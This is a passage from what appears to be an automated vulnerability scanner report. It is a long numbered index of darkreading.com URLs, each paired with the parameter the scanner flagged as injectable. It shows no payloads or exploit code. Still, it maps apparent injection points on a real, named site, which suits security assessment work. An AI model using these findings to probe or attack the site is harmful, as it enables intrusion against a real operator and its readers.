3.211. http://www.darkreading.com/blog/227700510/relying-on-tools-makes-you-dumber.html [name of an arbitrarily supplied request parameter]

3.212. http://www.darkreading.com/blog/227700524/virtual-machines-for-fun-profit-and-pwnage.html [REST URL parameter 2]

3.213. http://www.darkreading.com/blog/227700524/virtual-machines-for-fun-profit-and-pwnage.html [REST URL parameter 3]

3.214. http://www.darkreading.com/blog/227700524/virtual-machines-for-fun-profit-and-pwnage.html [REST URL parameter 3]

3.215. http://www.darkreading.com/blog/227700524/virtual-machines-for-fun-profit-and-pwnage.html [name of an arbitrarily supplied request parameter]

3.216. http://www.darkreading.com/blog/227700535/using-the-36-stratagems-for-social-engineering.html [REST URL parameter 2]

3.217. http://www.darkreading.com/blog/227700535/using-the-36-stratagems-for-social-engineering.html [REST URL parameter 3]

3.218. http://www.darkreading.com/blog/227700535/using-the-36-stratagems-for-social-engineering.html [REST URL parameter 3]

3.219. http://www.darkreading.com/blog/227700535/using-the-36-stratagems-for-social-engineering.html [name of an arbitrarily supplied request parameter]

3.220. http://www.darkreading.com/blog/227700545/snort-ing-out-anomalies.html [REST URL parameter 2]

3.221. http://www.darkreading.com/blog/227700545/snort-ing-out-anomalies.html [REST URL parameter 3]

3.222. http://www.darkreading.com/blog/227700545/snort-ing-out-anomalies.html [REST URL parameter 3]

3.223. http://www.darkreading.com/blog/227700545/snort-ing-out-anomalies.html [name of an arbitrarily supplied request parameter]

3.224. http://www.darkreading.com/blog/227700548/real-world-attacks-with-social-engineering-tookit.html [REST URL parameter 2]

3.225. http://www.darkreading.com/blog/227700548/real-world-attacks-with-social-engineering-tookit.html [REST URL parameter 3]

3.226. http://www.darkreading.com/blog/227700548/real-world-attacks-with-social-engineering-tookit.html [REST URL parameter 3]

3.227. http://www.darkreading.com/blog/227700548/real-world-attacks-with-social-engineering-tookit.html [name of an arbitrarily supplied request parameter]

3.228. http://www.darkreading.com/blog/227700577/suspected-child-porn-hub-taken-offline.html [REST URL parameter 3]

3.229. http://www.darkreading.com/blog/227700577/suspected-child-porn-hub-taken-offline.html [REST URL parameter 3]

3.230. http://www.darkreading.com/blog/227700577/suspected-child-porn-hub-taken-offline.html [name of an arbitrarily supplied request parameter]

3.231. http://www.darkreading.com/blog/227700656/friction-free-security.html [REST URL parameter 2]

3.232. http://www.darkreading.com/blog/227700656/friction-free-security.html [REST URL parameter 3]

3.233. http://www.darkreading.com/blog/227700656/friction-free-security.html [REST URL parameter 3]

3.234. http://www.darkreading.com/blog/227700656/friction-free-security.html [name of an arbitrarily supplied request parameter]

3.235. http://www.darkreading.com/blog/227700682/protecting-your-network-from-the-unpatchable.html [REST URL parameter 2]

3.236. http://www.darkreading.com/blog/227700682/protecting-your-network-from-the-unpatchable.html [REST URL parameter 3]

3.237. http://www.darkreading.com/blog/227700682/protecting-your-network-from-the-unpatchable.html [REST URL parameter 3]

3.238. http://www.darkreading.com/blog/227700682/protecting-your-network-from-the-unpatchable.html [name of an arbitrarily supplied request parameter]

3.239. http://www.darkreading.com/blog/227700741/conquering-large-web-apps-with-solid-methodology.html [REST URL parameter 2]

3.240. http://www.darkreading.com/blog/227700741/conquering-large-web-apps-with-solid-methodology.html [REST URL parameter 3]

3.241. http://www.darkreading.com/blog/227700741/conquering-large-web-apps-with-solid-methodology.html [REST URL parameter 3]

3.242. http://www.darkreading.com/blog/227700741/conquering-large-web-apps-with-solid-methodology.html [name of an arbitrarily supplied request parameter]

3.243. http://www.darkreading.com/blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.html [REST URL parameter 2]

3.244. http://www.darkreading.com/blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.html [REST URL parameter 3]

3.245. http://www.darkreading.com/blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.html [REST URL parameter 3]

3.246. http://www.darkreading.com/blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.html [name of an arbitrarily supplied request parameter]

3.247. http://www.darkreading.com/blog/227700767/protecting-ssh-from-the-masses.html [REST URL parameter 2]

3.248. http://www.darkreading.com/blog/227700767/protecting-ssh-from-the-masses.html [REST URL parameter 3]

3.249. http://www.darkreading.com/blog/227700767/protecting-ssh-from-the-masses.html [REST URL parameter 3]

3.250. http://www.darkreading.com/blog/227700767/protecting-ssh-from-the-masses.html [name of an arbitrarily supplied request parameter]

3.251. http://www.darkreading.com/blog/227700795/there-s-a-recipe-for-that.html [REST URL parameter 2]

3.252. http://www.darkreading.com/blog/227700795/there-s-a-recipe-for-that.html [REST URL parameter 3]

3.253. http://www.darkreading.com/blog/227700795/there-s-a-recipe-for-that.html [REST URL parameter 3]

3.254. http://www.darkreading.com/blog/227700795/there-s-a-recipe-for-that.html [name of an arbitrarily supplied request parameter]

3.255. http://www.darkreading.com/blog/227700800/security-s-top-4-social-engineers-of-all-time.html [name of an arbitrarily supplied request parameter]

3.256. http://www.darkreading.com/blog/227700826/taking-usb-attacks-to-the-next-level.html [REST URL parameter 2]

3.257. http://www.darkreading.com/blog/227700826/taking-usb-attacks-to-the-next-level.html [REST URL parameter 3]

3.258. http://www.darkreading.com/blog/227700826/taking-usb-attacks-to-the-next-level.html [REST URL parameter 3]

3.259. http://www.darkreading.com/blog/227700826/taking-usb-attacks-to-the-next-level.html [name of an arbitrarily supplied request parameter]

3.260. http://www.darkreading.com/blog/227700830/detection-and-defense-of-windows-autorun-locations.html [REST URL parameter 2]

3.261. http://www.darkreading.com/blog/227700830/detection-and-defense-of-windows-autorun-locations.html [REST URL parameter 3]

3.262. http://www.darkreading.com/blog/227700830/detection-and-defense-of-windows-autorun-locations.html [REST URL parameter 3]

3.263. http://www.darkreading.com/blog/227700830/detection-and-defense-of-windows-autorun-locations.html [name of an arbitrarily supplied request parameter]

3.264. http://www.darkreading.com/blog/227700832/make-security-about-security-not-compliance.html [REST URL parameter 2]

3.265. http://www.darkreading.com/blog/227700832/make-security-about-security-not-compliance.html [REST URL parameter 3]

3.266. http://www.darkreading.com/blog/227700832/make-security-about-security-not-compliance.html [REST URL parameter 3]

3.267. http://www.darkreading.com/blog/227700832/make-security-about-security-not-compliance.html [name of an arbitrarily supplied request parameter]

3.268. http://www.darkreading.com/blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.html [REST URL parameter 2]

3.269. http://www.darkreading.com/blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.html [REST URL parameter 3]

3.270. http://www.darkreading.com/blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.html [REST URL parameter 3]

3.271. http://www.darkreading.com/blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.html [name of an arbitrarily supplied request parameter]

3.272. http://www.darkreading.com/blog/227700845/ways-to-slow-an-attacker.html [REST URL parameter 2]

3.273. http://www.darkreading.com/blog/227700845/ways-to-slow-an-attacker.html [REST URL parameter 3]

3.274. http://www.darkreading.com/blog/227700845/ways-to-slow-an-attacker.html [REST URL parameter 3]

3.275. http://www.darkreading.com/blog/227700845/ways-to-slow-an-attacker.html [name of an arbitrarily supplied request parameter]

3.276. http://www.darkreading.com/blog/227700846/data-visualization-for-faster-more-effective-pen-testing.html [REST URL parameter 2]

3.277. http://www.darkreading.com/blog/227700846/data-visualization-for-faster-more-effective-pen-testing.html [REST URL parameter 3]

3.278. http://www.darkreading.com/blog/227700846/data-visualization-for-faster-more-effective-pen-testing.html [REST URL parameter 3]

3.279. http://www.darkreading.com/blog/227700846/data-visualization-for-faster-more-effective-pen-testing.html [name of an arbitrarily supplied request parameter]

3.280. http://www.darkreading.com/blog/227700848/vxworks-vulnerability-tools-released.html [REST URL parameter 2]

3.281. http://www.darkreading.com/blog/227700848/vxworks-vulnerability-tools-released.html [REST URL parameter 3]

3.282. http://www.darkreading.com/blog/227700848/vxworks-vulnerability-tools-released.html [REST URL parameter 3]

3.283. http://www.darkreading.com/blog/227700848/vxworks-vulnerability-tools-released.html [name of an arbitrarily supplied request parameter]

3.284. http://www.darkreading.com/blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html [REST URL parameter 2]

3.285. http://www.darkreading.com/blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html [REST URL parameter 3]

3.286. http://www.darkreading.com/blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html [REST URL parameter 3]

3.287. http://www.darkreading.com/blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html [name of an arbitrarily supplied request parameter]

3.288. http://www.darkreading.com/blog/227700876/web-based-spam-detection-with-google-alerts.html [REST URL parameter 2]

3.289. http://www.darkreading.com/blog/227700876/web-based-spam-detection-with-google-alerts.html [REST URL parameter 3]

3.290. http://www.darkreading.com/blog/227700876/web-based-spam-detection-with-google-alerts.html [REST URL parameter 3]

3.291. http://www.darkreading.com/blog/227700876/web-based-spam-detection-with-google-alerts.html [name of an arbitrarily supplied request parameter]

3.292. http://www.darkreading.com/blog/227700916/facebook-s-security-team-frustrates-cybercriminals.html [name of an arbitrarily supplied request parameter]

3.293. http://www.darkreading.com/blog/227700968/lock-picking-popularity-grows.html [REST URL parameter 2]

3.294. http://www.darkreading.com/blog/227700968/lock-picking-popularity-grows.html [REST URL parameter 3]

3.295. http://www.darkreading.com/blog/227700968/lock-picking-popularity-grows.html [REST URL parameter 3]

3.296. http://www.darkreading.com/blog/227700968/lock-picking-popularity-grows.html [name of an arbitrarily supplied request parameter]

3.297. http://www.darkreading.com/blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.html [REST URL parameter 2]

3.298. http://www.darkreading.com/blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.html [REST URL parameter 3]

3.299. http://www.darkreading.com/blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.html [REST URL parameter 3]

3.300. http://www.darkreading.com/blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.html [name of an arbitrarily supplied request parameter]

3.301. http://www.darkreading.com/blog/227700991/top-excuses-for-foregoing-security-monitoring-logging.html [REST URL parameter 2]

3.302. http://www.darkreading.com/blog/227700991/top-excuses-for-foregoing-security-monitoring-logging.html [REST URL parameter 3]

3.303. http://www.darkreading.com/blog/227700991/top-excuses-for-foregoing-security-monitoring-logging.html [REST URL parameter 3]

3.304. http://www.darkreading.com/blog/227700991/top-excuses-for-foregoing-security-monitoring-logging.html [name of an arbitrarily supplied request parameter]

3.305. http://www.darkreading.com/blog/227700998/blocking-zero-days-with-emet-2-0.html [REST URL parameter 2]

3.306. http://www.darkreading.com/blog/227700998/blocking-zero-days-with-emet-2-0.html [REST URL parameter 3]

3.307. http://www.darkreading.com/blog/227700998/blocking-zero-days-with-emet-2-0.html [REST URL parameter 3]

3.308. http://www.darkreading.com/blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html [REST URL parameter 2]

3.309. http://www.darkreading.com/blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html [REST URL parameter 3]

3.310. http://www.darkreading.com/blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html [REST URL parameter 3]

3.311. http://www.darkreading.com/blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html [name of an arbitrarily supplied request parameter]

3.312. http://www.darkreading.com/blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html [REST URL parameter 2]

3.313. http://www.darkreading.com/blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html [REST URL parameter 3]

3.314. http://www.darkreading.com/blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html [REST URL parameter 3]

3.315. http://www.darkreading.com/blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html [name of an arbitrarily supplied request parameter]

3.316. http://www.darkreading.com/blog/228200587/cookies-social-media-and-firesheep.html [REST URL parameter 2]

3.317. http://www.darkreading.com/blog/228200587/cookies-social-media-and-firesheep.html [REST URL parameter 3]

3.318. http://www.darkreading.com/blog/228200587/cookies-social-media-and-firesheep.html [REST URL parameter 3]

3.319. http://www.darkreading.com/blog/228200587/cookies-social-media-and-firesheep.html [name of an arbitrarily supplied request parameter]

3.320. http://www.darkreading.com/blog/228200589/nosql-not-much-anyway.html [REST URL parameter 2]

3.321. http://www.darkreading.com/blog/228200589/nosql-not-much-anyway.html [REST URL parameter 3]

3.322. http://www.darkreading.com/blog/228200589/nosql-not-much-anyway.html [REST URL parameter 3]

3.323. http://www.darkreading.com/blog/228200589/nosql-not-much-anyway.html [name of an arbitrarily supplied request parameter]

3.324. http://www.darkreading.com/blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html [REST URL parameter 2]

3.325. http://www.darkreading.com/blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html [REST URL parameter 3]

3.326. http://www.darkreading.com/blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html [REST URL parameter 3]

3.327. http://www.darkreading.com/blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html [name of an arbitrarily supplied request parameter]

3.328. http://www.darkreading.com/blog/228600139/avast-ye-pirates-it-s-free.html [name of an arbitrarily supplied request parameter]

3.329. http://www.darkreading.com/blog/228800188/the-hazards-of-bot-volunteerism.html [REST URL parameter 2]

3.330. http://www.darkreading.com/blog/228800188/the-hazards-of-bot-volunteerism.html [REST URL parameter 3]

3.331. http://www.darkreading.com/blog/228800188/the-hazards-of-bot-volunteerism.html [REST URL parameter 3]

3.332. http://www.darkreading.com/blog/228800188/the-hazards-of-bot-volunteerism.html [name of an arbitrarily supplied request parameter]

3.333. http://www.darkreading.com/blog/archives/2008/01/index.html [name of an arbitrarily supplied request parameter]

3.334. http://www.darkreading.com/blog/archives/2008/02/index.html [name of an arbitrarily supplied request parameter]

3.335. http://www.darkreading.com/blog/archives/2008/03/index.html [name of an arbitrarily supplied request parameter]

3.336. http://www.darkreading.com/blog/archives/2008/04/index.html [REST URL parameter 3]

3.337. http://www.darkreading.com/blog/archives/2008/04/index.html [name of an arbitrarily supplied request parameter]

3.338. http://www.darkreading.com/blog/archives/2009/01/index.html [REST URL parameter 3]

3.339. http://www.darkreading.com/blog/archives/2009/01/index.html [REST URL parameter 4]

3.340. http://www.darkreading.com/blog/archives/2009/01/index.html [name of an arbitrarily supplied request parameter]

3.341. http://www.darkreading.com/blog/archives/2009/02/index.html [REST URL parameter 3]

3.342. http://www.darkreading.com/blog/archives/2009/02/index.html [REST URL parameter 4]

3.343. http://www.darkreading.com/blog/archives/2009/02/index.html [name of an arbitrarily supplied request parameter]

3.344. http://www.darkreading.com/blog/archives/2009/03/index.html [REST URL parameter 3]

3.345. http://www.darkreading.com/blog/archives/2009/03/index.html [REST URL parameter 4]

3.346. http://www.darkreading.com/blog/archives/2009/03/index.html [name of an arbitrarily supplied request parameter]

3.347. http://www.darkreading.com/blog/archives/2009/04/index.html [REST URL parameter 3]

3.348. http://www.darkreading.com/blog/archives/2009/04/index.html [REST URL parameter 4]

3.349. http://www.darkreading.com/blog/archives/2009/04/index.html [name of an arbitrarily supplied request parameter]

3.350. http://www.darkreading.com/blog/archives/2009/05/index.html [REST URL parameter 3]

3.351. http://www.darkreading.com/blog/archives/2009/05/index.html [REST URL parameter 4]

3.352. http://www.darkreading.com/blog/archives/2009/05/index.html [name of an arbitrarily supplied request parameter]

3.353. http://www.darkreading.com/blog/archives/2009/06/index.html [REST URL parameter 3]

3.354. http://www.darkreading.com/blog/archives/2009/06/index.html [REST URL parameter 4]

3.355. http://www.darkreading.com/blog/archives/2009/06/index.html [name of an arbitrarily supplied request parameter]

3.356. http://www.darkreading.com/blog/archives/2009/07/index.html [REST URL parameter 3]

3.357. http://www.darkreading.com/blog/archives/2009/07/index.html [REST URL parameter 4]

3.358. http://www.darkreading.com/blog/archives/2009/07/index.html [name of an arbitrarily supplied request parameter]

3.359. http://www.darkreading.com/blog/archives/2009/08/index.html [REST URL parameter 3]

3.360. http://www.darkreading.com/blog/archives/2009/08/index.html [REST URL parameter 4]

3.361. http://www.darkreading.com/blog/archives/2009/08/index.html [name of an arbitrarily supplied request parameter]

3.362. http://www.darkreading.com/blog/archives/2009/09/index.html [REST URL parameter 3]

3.363. http://www.darkreading.com/blog/archives/2009/09/index.html [REST URL parameter 4]

3.364. http://www.darkreading.com/blog/archives/2009/09/index.html [name of an arbitrarily supplied request parameter]

3.365. http://www.darkreading.com/blog/archives/2009/10/index.html [REST URL parameter 3]

3.366. http://www.darkreading.com/blog/archives/2009/10/index.html [REST URL parameter 4]

3.367. http://www.darkreading.com/blog/archives/2009/10/index.html [name of an arbitrarily supplied request parameter]

3.368. http://www.darkreading.com/blog/archives/2009/11/index.html [REST URL parameter 3]

3.369. http://www.darkreading.com/blog/archives/2009/11/index.html [REST URL parameter 4]

3.370. http://www.darkreading.com/blog/archives/2009/11/index.html [name of an arbitrarily supplied request parameter]

3.371. http://www.darkreading.com/blog/archives/2009/12/index.html [REST URL parameter 3]

3.372. http://www.darkreading.com/blog/archives/2009/12/index.html [REST URL parameter 4]

3.373. http://www.darkreading.com/blog/archives/2009/12/index.html [name of an arbitrarily supplied request parameter]

3.374. http://www.darkreading.com/blog/archives/2010/01/index.html [REST URL parameter 3]

3.375. http://www.darkreading.com/blog/archives/2010/01/index.html [name of an arbitrarily supplied request parameter]

3.376. http://www.darkreading.com/blog/archives/2010/02/index.html [REST URL parameter 3]

3.377. http://www.darkreading.com/blog/archives/2010/02/index.html [name of an arbitrarily supplied request parameter]

3.378. http://www.darkreading.com/blog/archives/2010/03/index.html [REST URL parameter 3]

3.379. http://www.darkreading.com/blog/archives/2010/03/index.html [name of an arbitrarily supplied request parameter]

3.380. http://www.darkreading.com/blog/archives/2010/04/index.html [REST URL parameter 3]

3.381. http://www.darkreading.com/blog/archives/2010/04/index.html [name of an arbitrarily supplied request parameter]

3.382. http://www.darkreading.com/blog/archives/2010/05/index.html [REST URL parameter 3]

3.383. http://www.darkreading.com/blog/archives/2010/05/index.html [name of an arbitrarily supplied request parameter]

3.384. http://www.darkreading.com/blog/archives/2010/06/index.html [REST URL parameter 3]

3.385. http://www.darkreading.com/blog/archives/2010/06/index.html [name of an arbitrarily supplied request parameter]

3.386. http://www.darkreading.com/blog/archives/2010/07/index.html [REST URL parameter 3]

3.387. http://www.darkreading.com/blog/archives/2010/07/index.html [REST URL parameter 4]

3.388. http://www.darkreading.com/blog/archives/2010/07/index.html [name of an arbitrarily supplied request parameter]

3.389. http://www.darkreading.com/blog/archives/2010/08/index.html [REST URL parameter 3]

3.390. http://www.darkreading.com/blog/archives/2010/08/index.html [REST URL parameter 4]

3.391. http://www.darkreading.com/blog/archives/2010/08/index.html [name of an arbitrarily supplied request parameter]

3.392. http://www.darkreading.com/blog/archives/2010/09/index.html [REST URL parameter 3]

3.393. http://www.darkreading.com/blog/archives/2010/09/index.html [REST URL parameter 4]

3.394. http://www.darkreading.com/blog/archives/2010/09/index.html [name of an arbitrarily supplied request parameter]

3.395. http://www.darkreading.com/blog/archives/2010/10/index.html [REST URL parameter 3]

3.396. http://www.darkreading.com/blog/archives/2010/10/index.html [REST URL parameter 4]

3.397. http://www.darkreading.com/blog/archives/2010/10/index.html [name of an arbitrarily supplied request parameter]

3.398. http://www.darkreading.com/blog/archives/2010/11/index.html [REST URL parameter 3]

3.399. http://www.darkreading.com/blog/archives/2010/11/index.html [REST URL parameter 4]

3.400. http://www.darkreading.com/blog/archives/2010/11/index.html [name of an arbitrarily supplied request parameter]

3.401. http://www.darkreading.com/blog/archives/2010/12/index.html [REST URL parameter 3]

3.402. http://www.darkreading.com/blog/archives/2010/12/index.html [REST URL parameter 4]

3.403. http://www.darkreading.com/blog/archives/2010/12/index.html [name of an arbitrarily supplied request parameter]

3.404. http://www.darkreading.com/blog/archives/cs-island/index.html [REST URL parameter 3]

3.405. http://www.darkreading.com/blog/archives/cs-island/index.html [REST URL parameter 3]

3.406. http://www.darkreading.com/blog/archives/cs-island/index.html [name of an arbitrarily supplied request parameter]

3.407. http://www.darkreading.com/blog/archives/dark-dominion/index.html [REST URL parameter 3]

3.408. http://www.darkreading.com/blog/archives/dark-dominion/index.html [REST URL parameter 3]

3.409. http://www.darkreading.com/blog/archives/dark-dominion/index.html [name of an arbitrarily supplied request parameter]

3.410. http://www.darkreading.com/blog/archives/evil-bytes/index.html [REST URL parameter 3]

3.411. http://www.darkreading.com/blog/archives/evil-bytes/index.html [REST URL parameter 3]

3.412. http://www.darkreading.com/blog/archives/evil-bytes/index.html [name of an arbitrarily supplied request parameter]

3.413. http://www.darkreading.com/blog/archives/evil_bytes/index.html [REST URL parameter 3]

3.414. http://www.darkreading.com/blog/archives/evil_bytes/index.html [REST URL parameter 3]

3.415. http://www.darkreading.com/blog/archives/hacked-off/index.html [REST URL parameter 3]

3.416. http://www.darkreading.com/blog/archives/hacked-off/index.html [REST URL parameter 3]

3.417. http://www.darkreading.com/blog/archives/hacked-off/index.html [name of an arbitrarily supplied request parameter]

3.418. http://www.darkreading.com/blog/archives/in-search-of-malware/index.html [REST URL parameter 3]

3.419. http://www.darkreading.com/blog/archives/in-search-of-malware/index.html [REST URL parameter 3]

3.420. http://www.darkreading.com/blog/archives/in-search-of-malware/index.html [name of an arbitrarily supplied request parameter]

3.421. http://www.darkreading.com/blog/archives/security-views/index.html [REST URL parameter 3]

3.422. http://www.darkreading.com/blog/archives/security-views/index.html [REST URL parameter 3]

3.423. http://www.darkreading.com/blog/archives/security-views/index.html [name of an arbitrarily supplied request parameter]

3.424. http://www.darkreading.com/blog/archives/sophoslabs-insights/index.html [REST URL parameter 3]

3.425. http://www.darkreading.com/blog/archives/sophoslabs-insights/index.html [REST URL parameter 3]

3.426. http://www.darkreading.com/blog/archives/sophoslabs-insights/index.html [name of an arbitrarily supplied request parameter]

3.427. http://www.darkreading.com/blog/calendar.html [name of an arbitrarily supplied request parameter]

3.428. http://www.darkreading.com/newsletters/subscribe.html [name of an arbitrarily supplied request parameter]

3.429. http://www.darkreading.com/security/antivirus [name of an arbitrarily supplied request parameter]

3.430. http://www.darkreading.com/security/application-security [name of an arbitrarily supplied request parameter]

3.431. http://www.darkreading.com/security/article/208803634/index.html [REST URL parameter 2]

3.432. http://www.darkreading.com/security/article/208803634/index.html [REST URL parameter 3]

3.433. http://www.darkreading.com/security/article/208803634/index.html [REST URL parameter 4]

3.434. http://www.darkreading.com/security/article/208803634/index.html [REST URL parameter 4]

3.435. http://www.darkreading.com/security/article/208803634/index.html [name of an arbitrarily supplied request parameter]

3.436. http://www.darkreading.com/security/article/208803672/index.html [REST URL parameter 2]

3.437. http://www.darkreading.com/security/article/208803672/index.html [REST URL parameter 3]

3.438. http://www.darkreading.com/security/article/208803672/index.html [REST URL parameter 4]

3.439. http://www.darkreading.com/security/article/208803672/index.html [REST URL parameter 4]

3.440. http://www.darkreading.com/security/article/208803672/index.html [name of an arbitrarily supplied request parameter]

3.441. http://www.darkreading.com/security/article/220000718/index.html [REST URL parameter 2]

3.442. http://www.darkreading.com/security/article/220000718/index.html [REST URL parameter 3]

3.443. http://www.darkreading.com/security/article/220000718/index.html [REST URL parameter 4]

3.444. http://www.darkreading.com/security/article/220000718/index.html [REST URL parameter 4]

3.445. http://www.darkreading.com/security/article/220000718/index.html [name of an arbitrarily supplied request parameter]

3.446. http://www.darkreading.com/security/article/222200174/index.html [REST URL parameter 2]

3.447. http://www.darkreading.com/security/article/222200174/index.html [REST URL parameter 3]

3.448. http://www.darkreading.com/security/article/222200174/index.html [REST URL parameter 4]

3.449. http://www.darkreading.com/security/article/222200174/index.html [REST URL parameter 4]

3.450. http://www.darkreading.com/security/article/222200174/index.html [name of an arbitrarily supplied request parameter]

3.451. http://www.darkreading.com/security/article/222300840/index.html [REST URL parameter 2]

3.452. http://www.darkreading.com/security/article/222300840/index.html [REST URL parameter 3]

3.453. http://www.darkreading.com/security/article/222300840/index.html [REST URL parameter 4]

3.454. http://www.darkreading.com/security/article/222300840/index.html [REST URL parameter 4]

3.455. http://www.darkreading.com/security/article/222300840/index.html [name of an arbitrarily supplied request parameter]

3.456. http://www.darkreading.com/security/article/222301436/index.html [REST URL parameter 2]

3.457. http://www.darkreading.com/security/article/222301436/index.html [REST URL parameter 3]

3.458. http://www.darkreading.com/security/article/222301436/index.html [REST URL parameter 4]

3.459. http://www.darkreading.com/security/article/222301436/index.html [REST URL parameter 4]

3.460. http://www.darkreading.com/security/article/222301436/index.html [name of an arbitrarily supplied request parameter]

3.461. http://www.darkreading.com/security/article/222301500/index.html [REST URL parameter 2]

3.462. http://www.darkreading.com/security/article/222301500/index.html [REST URL parameter 3]

3.463. http://www.darkreading.com/security/article/222301500/index.html [REST URL parameter 4]

3.464. http://www.darkreading.com/security/article/222301500/index.html [REST URL parameter 4]

3.465. http://www.darkreading.com/security/article/222301500/index.html [name of an arbitrarily supplied request parameter]

3.466. http://www.darkreading.com/security/article/222600139/index.html [REST URL parameter 2]

3.467. http://www.darkreading.com/security/article/222600139/index.html [REST URL parameter 3]

3.468. http://www.darkreading.com/security/article/222600139/index.html [REST URL parameter 4]

3.469. http://www.darkreading.com/security/article/222600139/index.html [REST URL parameter 4]

3.470. http://www.darkreading.com/security/article/222600139/index.html [name of an arbitrarily supplied request parameter]

3.471. http://www.darkreading.com/security/article/222900286/index.html [REST URL parameter 2]

3.472. http://www.darkreading.com/security/article/222900286/index.html [REST URL parameter 3]

3.473. http://www.darkreading.com/security/article/222900286/index.html [name of an arbitrarily supplied request parameter]

3.474. http://www.darkreading.com/security/article/222900775/index.html [REST URL parameter 2]

3.475. http://www.darkreading.com/security/article/222900775/index.html [REST URL parameter 3]

3.476. http://www.darkreading.com/security/article/222900775/index.html [REST URL parameter 4]

3.477. http://www.darkreading.com/security/article/222900775/index.html [REST URL parameter 4]

3.478. http://www.darkreading.com/security/article/222900775/index.html [name of an arbitrarily supplied request parameter]

3.479. http://www.darkreading.com/security/article/223100233/index.html [REST URL parameter 2]

3.480. http://www.darkreading.com/security/article/223100233/index.html [REST URL parameter 3]

3.481. http://www.darkreading.com/security/article/223100233/index.html [REST URL parameter 4]

3.482. http://www.darkreading.com/security/article/223100233/index.html [REST URL parameter 4]

3.483. http://www.darkreading.com/security/article/223100233/index.html [name of an arbitrarily supplied request parameter]

3.484. http://www.darkreading.com/security/article/223100436/index.html [REST URL parameter 2]

3.485. http://www.darkreading.com/security/article/223100436/index.html [REST URL parameter 3]

3.486. http://www.darkreading.com/security/article/223100436/index.html [REST URL parameter 4]

3.487. http://www.darkreading.com/security/article/223100436/index.html [REST URL parameter 4]

3.488. http://www.darkreading.com/security/article/223100436/index.html [name of an arbitrarily supplied request parameter]

3.489. http://www.darkreading.com/security/article/223100902/index.html [REST URL parameter 2]

3.490. http://www.darkreading.com/security/article/223100902/index.html [REST URL parameter 3]

3.491. http://www.darkreading.com/security/article/223100902/index.html [REST URL parameter 4]

3.492. http://www.darkreading.com/security/article/223100902/index.html [REST URL parameter 4]

3.493. http://www.darkreading.com/security/article/223100902/index.html [name of an arbitrarily supplied request parameter]

3.494. http://www.darkreading.com/security/article/223800139/index.html [REST URL parameter 2]

3.495. http://www.darkreading.com/security/article/223800139/index.html [REST URL parameter 3]

3.496. http://www.darkreading.com/security/article/223800139/index.html [REST URL parameter 4]

3.497. http://www.darkreading.com/security/article/223800139/index.html [REST URL parameter 4]

3.498. http://www.darkreading.com/security/article/223800139/index.html [name of an arbitrarily supplied request parameter]

3.499. http://www.darkreading.com/security/article/223800256/index.html [REST URL parameter 2]

3.500. http://www.darkreading.com/security/article/223800256/index.html [REST URL parameter 3]

3.501. http://www.darkreading.com/security/article/223800256/index.html [REST URL parameter 4]

3.502. http://www.darkreading.com/security/article/223800256/index.html [REST URL parameter 4]

3.503. http://www.darkreading.com/security/article/223800256/index.html [name of an arbitrarily supplied request parameter]

3.504. http://www.darkreading.com/security/article/224200523/index.html [REST URL parameter 2]

3.505. http://www.darkreading.com/security/article/224200523/index.html [REST URL parameter 3]

3.506. http://www.darkreading.com/security/article/224200523/index.html [REST URL parameter 4]

3.507. http://www.darkreading.com/security/article/224200523/index.html [REST URL parameter 4]

3.508. http://www.darkreading.com/security/article/224200523/index.html [name of an arbitrarily supplied request parameter]

3.509. http://www.darkreading.com/security/article/224201355/index.html [REST URL parameter 2]

3.510. http://www.darkreading.com/security/article/224201355/index.html [REST URL parameter 3]

3.511. http://www.darkreading.com/security/article/224201355/index.html [REST URL parameter 4]

3.512. http://www.darkreading.com/security/article/224201355/index.html [REST URL parameter 4]

3.513. http://www.darkreading.com/security/article/224201355/index.html [name of an arbitrarily supplied request parameter]

3.514. http://www.darkreading.com/security/article/224500077/index.html [REST URL parameter 2]

3.515. http://www.darkreading.com/security/article/224500077/index.html [REST URL parameter 3]

3.516. http://www.darkreading.com/security/article/224500077/index.html [REST URL parameter 4]

3.517. http://www.darkreading.com/security/article/224500077/index.html [REST URL parameter 4]

3.518. http://www.darkreading.com/security/article/224500077/index.html [name of an arbitrarily supplied request parameter]

3.519. http://www.darkreading.com/security/article/224600304/index.html [REST URL parameter 2]

3.520. http://www.darkreading.com/security/article/224600304/index.html [REST URL parameter 3]

3.521. http://www.darkreading.com/security/article/224600304/index.html [REST URL parameter 4]

3.522. http://www.darkreading.com/security/article/224600304/index.html [REST URL parameter 4]

3.523. http://www.darkreading.com/security/article/224600304/index.html [name of an arbitrarily supplied request parameter]

3.524. http://www.darkreading.com/security/article/224700541/index.html [REST URL parameter 2]

3.525. http://www.darkreading.com/security/article/224700541/index.html [REST URL parameter 3]

3.526. http://www.darkreading.com/security/article/224700541/index.html [REST URL parameter 4]

3.527. http://www.darkreading.com/security/article/224700541/index.html [REST URL parameter 4]

